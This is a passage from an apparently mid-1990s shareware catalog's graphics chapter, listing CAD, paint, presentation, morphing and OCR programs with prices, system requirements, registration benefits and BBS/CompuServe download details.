quick-reference card; 31/2" master disk(s); 3 months of + unlimited BBS, CompuServe, GEnie, newsletter support; bonus + + Chapter 14, "Graphics" 490 + + + + utilities; bonus data; bonus fonts; bonus graphics; bonus + templates; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: availability unknown on BBSs. + Download size: 1440k (about 107 minutes with a 2400 baud modem) + Description: + A low-cost but full-featured CAD drafting package that is + suitable for anyone who needs to draw with precision but who + doesn't need a high-end CAD package. This easy-to-use, cost- + effective professional-quality software product combines 2-D + drafting functionality with a fast redraw speed, pop-up menus, + support for 256 layers, and the ability to import or export + graphic data. More than 150.000 copies sold world wide. Quality + made in Germany. + + + Product: TommySoftware CAD/DRAW 4 Level1 + Author: , 212-807-9720 + Version: 4.00e (09-12-95) + Needs: Unknown. 4096k RAM; VGA monitor; Mouse. + Registration fee: US$79.95 (add US$5.00 for shipping to U.S. + addresses) (add US$12.00 for shipping to Canadian addresses) + (add US$15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited fax, BBS, CompuServe, GEnie, newsletter support; + bonus utilities; bonus data; bonus fonts; bonus graphics; bonus + templates; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs. + Download size: 2700k (about 201 minutes with a 2400 baud modem) + Description: + A full fledged 32 bit graphics application that combines the + advantages of powerful illustration packages with the precision + of CAD products without their complicated interfaces. + TommySoftware CAD/DRAW 4 Level 1 is the preferred tool for + sketching, drafting, floor plans, landscape design, technical + illustrations or designs. Quality made in Germany. Successor of + CAD/DRAW 2. + + + Product: TommySoftware Tek Illustrator + Author: , 212-807-9720 + Version: 3.16e (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: US$129.00 (add US$5.00 for shipping to U.S. + addresses) (add US$12.00 for shipping to Canadian addresses) + (add US$15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited BBS, CompuServe, GEnie, newsletter support; bonus + utilities; bonus data; bonus fonts; bonus graphics; bonus + + Chapter 14, "Graphics" 491 + + + + templates; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: availability unknown on BBSs. + Download size: 2600k (about 193 minutes with a 2400 baud modem) + Description: + A full-featured illustration program with the capabilities of + high-end drawing packages at a fraction of the cost. A good + add-on to a person's suite of desktop applications, it lets + even inexperienced users t up to speed quickly. Anyone who + needs to create technical illustrations and graphics quickly + but precisely will appreciate its very rich array of features. + Quality made in Germany. + + + Product: Top Draw + Author: , 303-838-0384 + Version: 2.0 (06-30-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $59.95 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, + newsletter, mail support; 2-month limited return policy; bonus + data; bonus graphics; bonus templates; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: TOPDR20A.ZIP on BBSs (multiple files); TOPD20.ZIP on + CompuServe in CIS:DTPFORUM forum LIBrary 6 (or contact userID + 72643,436 for assistance). + SWREG#: 1811 + Download size: 820k (about 61 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 winner, Shareware Industry + Awards. + Description: + 1994 SIA Award Winner for Best Graphics Program! Powerful yet + easy to use object-oriented drawing program. For: DTP, charts, + illustrations, logos, brochures, newsletters, more. Rotating + text, text on a line, convert text to curves, text wraps to fit + shapes, gradient fills, textures, calligraphic pens, unlimited + named layers, complete Bezier curve support, context-sensitive + help, status line, excellent shape palette, comprehensive + multi-level undo. Import/export WMF, BMP and PCX. Much more! + + + Product: TreeDraw + Family tree graphics chart editor. See full description on + page 542. + + Chapter 14, "Graphics" 492 + + + + 14.3 Paint programs + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 198. + + Product: Paint Shop Pro [***] + Author: , 612-930-9171 + Version: 3.11 (08-14-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; bonus graphics; discounts on + upgrades. + Look for: PSP311.ZIP on BBSs (call 612-930-3516 to download it at + no charge); PSP.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + SWREG#: 4448 + PsL#: 10286 + Download size: 1800k (about 134 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + The complete Windows graphics program for image creation, + viewing, and manipulation. Features include painting with 8 + brushes, photo retouching, image enhancement and editing, color + enhancement, image browser, batch conversion and scanner + support. Included are 20 standard filters and 12 deformations. + Support plug-in filters. Over 34 file formats supported. + + Chapter 14, "Graphics" 493 + + + + Product: PC-Draft II + Author: , 708-377-7320 + Version: 3.26 (01-01-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Mouse. + Registration fee: $50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; all ASP-wide + offers (see page 5). + Look for: PCD2-*.ZIP on BBSs; PC-DRA.ARC on CompuServe in + CIS:PCAPP forum LIBrary 10 (multiple files) (or contact userID + 70047,744 for assistance). + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + General purpose paint program. Includes graphics and text + screen capture & the PIX graphics language for animated + slideshows. Exports GEM .IMG format - perfect to include in + your word processor. Supports most Laser & dot-matrix printers. + Draw circles, lines, boxes, shaded rectangles, spray paint, + free-form drawing, edit fill patterns, and fonts; keyboard + macros; creates line and bar graphs; comes with clip-art + library. Makes bitmaps up to 1280x700 dots. + + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 92. + + Product: SuperFlow + Windows based flowcharting & presentation. See full + description on page 489. + + Chapter 14, "Graphics" 494 + + + + 14.3.1 Graphics diversions + + Product: DAZZLE + Author: , 713-298-1698 + Version: 5.1b (03-19-95) + Needs: IBM PC, DOS 3.1 or better. 350k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; math coprocessor. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter, mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; DAZZLE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 5 (or contact userID 76236,1573 for + assistance). + SWREG#: 150 + PsL#: 11205 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A 2D image engine for DOS and Windows as seen on CNN + FutureWatch. This non-TSR program has many images and menus. + Now the generally recognized defacto standard for self- + directing computer art. Config menu, help, integrated doc file, + fades. A version of this program was used to make the DAZZLE + Long Form Music Video from Miramar, now on VHS and video + LaserDisk. + + + Product: Frenetic Screensaver + Author: , +61-2-879-4482 + Version: 3.3 (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Strongly recommended: SVGA monitor. + Registration fee: $10.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 3 months of + unlimited fax, CompuServe, mail support; all ASP-wide offers + (see page 5); discounts on upgrades. + Look for: FRENET33.ZIP on BBSs; FRENET.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 9 (or contact userID 72317,3646 for + assistance). + SWREG#: 4667 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Endless colorful graphic abstractions are painted from a wealth + of drawing elements. Windows screensaver. Uses a 256 color + palette or 16-color VGA. + + Chapter 14, "Graphics" 495 + + + + Product: Hubble + Author: + Version: 2.21 (06-15-95) + Needs: IBM AT (80286), Windows 3.0 or better. 4096k RAM; Hard + disk; Mouse. + Registration fee: $37.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; HUBBLE.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 10 (or contact userID 74544,3676 for + assistance). + SWREG#: 3501 + Download size: 1156k (about 86 minutes with a 2400 baud modem) + Description: + Image editing, processing and manipulation. Add drawing, text, + etc. image patching, area fill. Process multiple images by + merge and stitch(+scaling). Interactive fine-tuning of + brightness, tone, color and contrast of image. Predefined and + custom design of filters, color conversion and dithering. + Document processing allows users to add and rearrange drawings, + text, etc. to document. Transform, scale, flip, and trim + images. Screen capture. Support TWAIN scanner. + + + Product: Image'n'Bits + Image enhancement program for Windows. See full description on + page 484. + + Product: JailBird + Author: , 317-782-9903 + Version: 2.50 (03-25-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $19.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 5). + Look for: JBIRD250.ZIP on BBSs (call 317-784-2147 to download it + at no charge); JBIRD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 17 (or contact userID 73567,1547 for assistance). + SWREG#: 1494 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + An entertaining mouse-driven program which lets the user create + and print replicas of "vanity" license plates. User can even + include personalized license plate "mounting bracket" around + the plate. WYSIWYG screen interface. Configurable on-screen + colors. Plates will include the state "slogan" at the bottom. + Will output to a wide variety of printers, even color printers. + Also output to PCX file. + + Chapter 14, "Graphics" 496 + + + + Product: Photo Show 3D + 3D Windows screen saver. See full description on page 69. + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 517. + + Product: Tangram + The anceint Chinesee jigsaw puzzle. See full description on + page 615. + + + 14.4 Presentation graphics + + See also: Business, Training & support aids, Lecturing & slide + shows. + + Product: BitMapZ For Windows + Author: , 816-429-3558 + Version: 2.30 (01-20-95) + Needs: IBM 80386, Windows 3.0 or better. 330k RAM; CGA monitor; + Dual 720k floppy drives; Mouse. + Registration fee: $14.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; bonus graphics; all + ASP-wide offers (see page 5); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: BMPZW230.ZIP on BBSs (call 317-784-2147 to download it + at no charge); BMPZ4W.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 1715 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + Designed to help you create slide shows using BMPs. It gives + you the control over the slide's background colour, duration of + the slide, and lets you add a clear title to each slide, making + them easier to find. Now you can have your PC help with + presentations, relaxation, teaching or just give yourself a + visual break anytime you need it. The program is also useful + for displays, where you can have passers by examine your + product while you are away or busy. Easy to use and fun to + watch! + + + Product: Bubble Chart + Bubble chart, animated graph. See full description on + page 291. + + Product: The Complete Morph + Full featured morphing facility for spec. F/X. See full + description on page 498. + + Chapter 14, "Graphics" 497 + + + + Product: Crowndale Tales : ESCAPE! + Multimedia fable. See full description on page 617. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 487. + + Product: FF Graphics Conversion Utility + Convert metafiles and icons to bitmaps. See full description + on page 514. + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 363. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 330. + + Product: MegaCad [***] + CAD program. See full description on page 501. + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: SmartDraw 95 [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: SuperFlow + Windows based flowcharting & presentation. See full + description on page 489. + + 14.4.1 Animation applications + + Product: The Complete Image + New image processor for big jobs/animations. See full + description on page 504. + + Product: Photo Show 3D + 3D Windows screen saver. See full description on page 69. + + Chapter 14, "Graphics" 498 + + + + Product: StarFlic + Author: , 508-794-9377 + Version: 1.2 (04-14-94) + Needs: IBM PC, DOS 3.2 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + EMS memory. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; bonus utilities; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: SFLIC.EXE on BBSs; SFLIC.EXE on CompuServe in CIS:PCAPP + forum LIBrary 10 (or contact userID 71333,103 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A flic file (FLI) compiler and player program. Create flic + files from True Vision TGA, or 16-color PCX image files. Play + FLI and basic FLC files compiled by other programs. User + specified anti-aliasing and image reduction using a 3x3 + Bartlett filter. Frame delay, gray scale color mapping, color + intensity averaging, VESA 256-color support, and more... + + + 14.4.1.1 "Morphing" applications + + Product: The Complete Morph + Author: , 313-941-9223 + Version: 2.10 (02-26-94) + Needs: IBM 80386, DOS 3.3 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: SVGA monitor; math coprocessor. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; bonus data; + bonus graphics; discounts on upgrades. Lifetime free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; CMORPH.ZIP on CompuServe + in CIS:GRAPHDEV forum LIBrary 13 (or contact userID 72163,2442 + for assistance). + SWREG#: 1629 + Download size: 476k (about 36 minutes with a 2400 baud modem) + Description: + Very user-friendly morphing facility. Advanced mesh editing + allows easy mesh creation, and includes a 'live' zoom-window + for pixel-perfect mesh points. 3 different spline types for + various morphing effects. Breaks the 640K barrier with built- + + Chapter 14, "Graphics" 499 + + + + in virtual memory. Runs in 32-bit protected mode for more + speed and memory. Includes Overlays, backgrounds, over 100 + user definable image processing filters built in. Speed mode + and high-quality modes. Plenty of other options and user + settings. + + + 14.5 CAD/CAM applications + + See also: Engineering; Graphics, Software tools & add-ins, For + AutoCAD. + + Product: DRAFT CHOICE + Author: , 508-794-9377 + Version: 2.00e (01-06-94) + Needs: IBM PC, DOS 3.2 or better. 412k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; HP LaserJet printer; + Epson printer. + Strongly recommended: EGA monitor; Hard disk; Plotter; XMS + memory; math coprocessor. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; bonus utilities; bonus fonts; discounts on other + products; discounts on upgrades. Bonus symbol libraries. + Look for: DC20E.ZIP on BBSs (call 617-354-2505 to download it at + no charge); DC.ZIP on CompuServe in CIS:PCAPP forum LIBrary 10 + (or contact userID 71333,103 for assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + Vector based, affordable CAD program with over 200 drawing, + viewing and editing commands. Mouse and keyboard operation. + 9-pin, 24-pin, HP LaserJet/DeskJet, PostScript and HP plotter + support. Auto-dimensioning, 256 layers, English and metric + units, auto-scaling, powerful floating point zoom, symbol + library support, animation, on-line calculator, parametric + function generator, EMS and virtual memory support, 3-D type + volume rendering, parallel, vertical, tangent modes, and much + more... + + Chapter 14, "Graphics" 500 + + + + Product: GammaCAD PRO + Author: , 970-490-2928 + Version: 2.00 (07-10-95) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 2-month limited return policy; discounts on + upgrades. + Look for: availability unknown on BBSs; GCADP200.ZIP on + CompuServe in CIS:WINPROD forum LIBrary 20 (or contact userID + 73737,1721 for assistance); GCADP200.ZIP on GEnie in WINDOWS + forum LIBrary 3. + SWREG#: 6911 + Download size: 920k (about 69 minutes with a 2400 baud modem) + Description: + GammaCAD PRO is a full featured CAD program in an easy to use + package. Create floor plans, maps, graphs, charts, landscapes, + circuit diagrams, technical drawings, labels and much more. On- + line tutorials and examples get you up and running in no time. + DXF import/export capabilities allow you to transfer drawings + between GammaCAD and other CAD programs. Copy/paste drawings + into your word processor. Features include: symbol libraries, + grids, element snaps, automatic page setup, print and plot. + + + Product: Home Plan + Author: , 209-754-4891 + Version: 2.7 (11-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, + CompuServe, GEnie, mail support; bonus utilities; discounts on + other products. + Look for: HOME27.ZIP on BBSs; HOME27.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (or contact userID 71321,167 for + assistance); HOME27.EXE on GEnie in IBMPC forum LIBrary 15 (or + contact userID C.HERNDON for assistance). + SWREG#: 388 + Download size: 134k (about ten minutes with a 2400 baud modem) + Description: + Draw, save & print house plans. Easy to learn & use. + * Move, copy, resize, mirror + * Undo, redo, clone + + Chapter 14, "Graphics" 501 + + + + * Automatic dimensioning, supports metric + * Optionally shows framing (studs/joists/etc.) + * Rectangles, circles, Arcs, etc. + * Delete screen areas + * Selectable line styles + * On-screen odometers, protractor + * Automatic door insertion + * Variable width walls + * Print screen size or 1/8" per ft scale + * Insert pre-drawn furniture/appliances + * Sq ft calculation + + + Product: Layout + Office layout and equipment inventory. See full description on + page 290. + + Product: MegaCad [***] + Author: , 206-361-0882 + Version: 1.0 (10-13-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Mouse. + Registration fee: $49.95 (add $4.95 for shipping to U.S. + addresses) (add $9.95 for shipping to Canadian addresses) (add + $9.95 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of fax, CompuServe, mail support; all ASP-wide offers + (see page 5). + Look for: MGCAD10.ZIP on BBSs; MGCAD.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 102562,1411 for + assistance); MGCAD10.ZIP on GEnie in 0 forum LIBrary 0. + SWREG#: 8169 + PsL#: 14279 + Download size: 1442k (about 107 minutes with a 2400 baud modem) + Description: + A powerful, easy to learn, Computer Aided Design (CAD) program. + It can produce accurately scaled drawings, or just pretty + pictures to paste into your favorite word processor, MegaCad + can be used for Drafting, House plans, Decks, Business Cards, + Forms, Signs, Labels, Maps, Flow Charts, Home or School + Projects, etc. A true 32-bit program compatible with Windows, + Windows NT, or Windows 95. + + Chapter 14, "Graphics" 502 + + + + Product: PC-Draft-CAD + Author: , 708-377-7320 + Version: 3.06g (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $65.00 (Canadian dollars) (add $91.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; all ASP-wide + offers (see page 5); disks of other shareware. + Look for: PCDCAD*.ZIP on BBSs (multiple files); PCCAD*.EX on + CompuServe in CIS:PCAPP forum LIBrary 10 (multiple files) (or + contact userID 70047,744 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A full featured CAD system with features found in expensive + commercial CAD systems. Automatic dimensions, unlimited layers, + named objects in group libraries, context sensitive help, print + on plotters, dot-matrix, lasers. Exact scale output in feet- + inches, metric, decimal feet or inches. Keyboard macros. Import + WordPerfect .WPG, .DXF; export .WPG, .GEM, ASCII or HPGL + formats. Includes fonts, sample drawings, symbol libraries. + spline curves, area calc. Virtual memory. + + + Product: PrintGF + Image printer. See full description on page 78. + + Product: PrintGL + Pen plotter emulator package. See full description on page 78. + + Chapter 14, "Graphics" 503 + + + + Product: ProtoCAD 3D + Author: , 508-794-9377 + Version: 2.00 (04-23-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Dual + 720k floppy drives; HP LaserJet printer; Mouse; Plotter; Epson + printer; EMS memory. + Strongly recommended: Hard disk. + Registration fee: $59.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; + discounts on other products; discounts on upgrades. + Look for: PC3D20.ZIP on BBSs; PCAD3D.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (or contact userID 71333,103 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Powerful 3-Dimensional CAD/rendering program. Windows-like, on + screen toolbar; dynamic trackball viewpoint rotation; + perspective, isometric, and plane views; realistic light source + and surface shading; user defined color mixing; 32 layers; 3D + drawing tools (cone, block, mesh, prism...); powerful extrude, + revolve, sweep, skin and patch 3D commands, full compliment of + editing commands (Copy, Move, Scale...); TGA, POV, PCX output; + VESA support; more... + + + Product: TommySoftware CAD/DRAW + The CAD shareware standard. See full description on page 489. + + Product: TommySoftware Tek Illustrator + Most powerful graphics application. See full description on + page 490. + + Chapter 14, "Graphics" 504 + + + + 14.5.1 Vector/ray tracing + + Product: REALIZE + Author: + Version: 1.0 (09-21-94) + Needs: IBM PC, DOS 5.0 or better. VGA monitor; Hard disk. POV + 2.0 or later (freeware raytracer). + Strongly recommended: AutoCad or other .DXF file generator. + Registration fee: $50.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + mail support; bonus utilities; bonus data; bonus graphics; all + ASP-wide offers (see page 5). + Look for: REALIZE.ZIP on BBSs. + Download size: 272k (about 20 minutes with a 2400 baud modem) + Description: + A full-featured, one-step .DXF-to-POV raytracer description + file format converter. It converts all 3D entities and extruded + 2D entities to a ready-to-trace package. Fully converts simple + and nested blocks as well as the 256 standard colors. Full + control of smoothing, texturing, etc. is implemented via a + "directive file". Other features: automatic generation of + floors,skies,and lighting; infinitely smooth shapes; bit maps; + CSG; 2D effects; others. + + + Product: TommySoftware CAD/DRAW 4 Level1 + The 32bit verison of the CAD shareware stand. See full + description on page 490. + + + 14.6 Business applications + + See also: Business. + + Chapter 14, "Graphics" 505 + + + + Product: The Complete Image + Author: , 313-941-9223 + Version: 3.11 (07-01-93) + Needs: IBM 80386, DOS 3.3 or better. 2000k RAM; VGA monitor; + Hard disk. + Strongly recommended: math coprocessor. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; discounts on upgrades. 3-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; CIMAGE.ZIP on CompuServe + in CIS:GRAPHDEV forum LIBrary 6 (or contact userID 72163,2442 + for assistance). + Download size: 347k (about 26 minutes with a 2400 baud modem) + Description: + A new concept in image processing. Its batch abilities + combined with macros make it a powerful tool for large + amination projects. Command line interface offers much more + flexibility than most other interfaces. Features include: + read/write/merge/convert TGA/IMG/BMP/GIF and IPI; complete + 24-bit VESA support (1.2 VBE); online help; macros; over 100 + filters built in; uses all memory plus VMM; gamma corr. & + contrast enh.; blue screen effects; much much more! + + + Product: EXPRESSGRAPH + Author: , 206-788-0932 + Version: 1.05 (05-01-92) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; CGA monitor; Epson + printer. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: EGRAF1.ZIP on BBSs (call 206-788-4008 to download it at + no charge); EGRAF1.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 10 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + The size of the graph can be adjusted by changing the height + and width. Horizontal and vertical grids can easily be turned + on or off. The scaling factor can be controlled. Graph up to + 16 groups of 52 numbers each using 16 different fill patterns. + Line graphs can be made with or without symbols. Bar charts + can be regular, overlapped, stacked, percentage or three + dimensional. Pie charts can be uncut, exploded or separated. + Import data from other programs. + + Chapter 14, "Graphics" 506 + + + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 363. + + Product: MegaCad [***] + CAD program. See full description on page 501. + + Product: SmartDraw [***] + Author: , 619-549-0314 + Version: 2.02 (10-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $35.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, mail support; 1-month return policy; + bonus graphics; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: SMRTDRW.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SMRTDR.ZIP on CompuServe in CIS:WINPROD forum + LIBrary 15 (or contact userID 75334,3714 for assistance). + SWREG#: 4133 + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Easy-to-use program for Windows that lets anyone draw great + looking diagrams, flowcharts, flyers, maps, and other business + graphics. Better value and easier to use than Visio, more + powerful than SnapGrafx, it provides drag & drop drawing, + automatic connecting lines between shapes, built-in design + styles and shape libraries. Works with Microsoft Office and + other programs as an OLE Server. You don't have to be an artist + to get professional results when you use this. Winner Best + Graphics Program, 1995. + + Chapter 14, "Graphics" 507 + + + + Product: SmartDraw 95 [***] + Author: , 619-549-0314 + Version: 2.02 (10-18-95) + Needs: IBM 80386, Windows 95 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $35.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, mail support; 1-month return policy; + bonus graphics; all ASP-wide offers (see page 5); discounts on + upgrades. + Look for: SMRTDRW.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SDRW95.ZIP on CompuServe in WIN:PROD forum + LIBrary 15 (or contact userID 75334,3714 for assistance). + SWREG#: 4134 + Download size: 650k (about 48 minutes with a 2400 baud modem) + Description: + Easy-to-use program for Win 95 that lets anyone draw great + looking diagrams, flowcharts, flyers, maps, and other business + graphics. Better value and easier to use than Visio, more + powerful than SnapGrafx, it provides drag & drop drawing, + automatic connecting lines between shapes, built-in design + styles and shape libraries. Works with Microsoft Office and + other programs as an OLE Server. You don't have to be an artist + to get professional results when you use this. Winner Best + Graphics Program, 1995. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 308. + + 14.6.1 OCR applications + + Product: WinOCR [***] + Author: , 071-359-0405 + Version: 2.0b (09-20-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; VGA + monitor; Hard disk. + Registration fee: $30.00 + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 5). + Look for: WINOCR.ZIP on BBSs; WINOCR.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 0 (or contact userID 100116,3254 for + assistance). + Download size: 225k (about 17 minutes with a 2400 baud modem) + Description: + An Optical Character Recognition program. It works with bitmaps + produced using low cost hand-held scanners and is intended to + provide an effective method of data entry for programmers and + others who require OCR. + + Chapter 14, "Graphics" 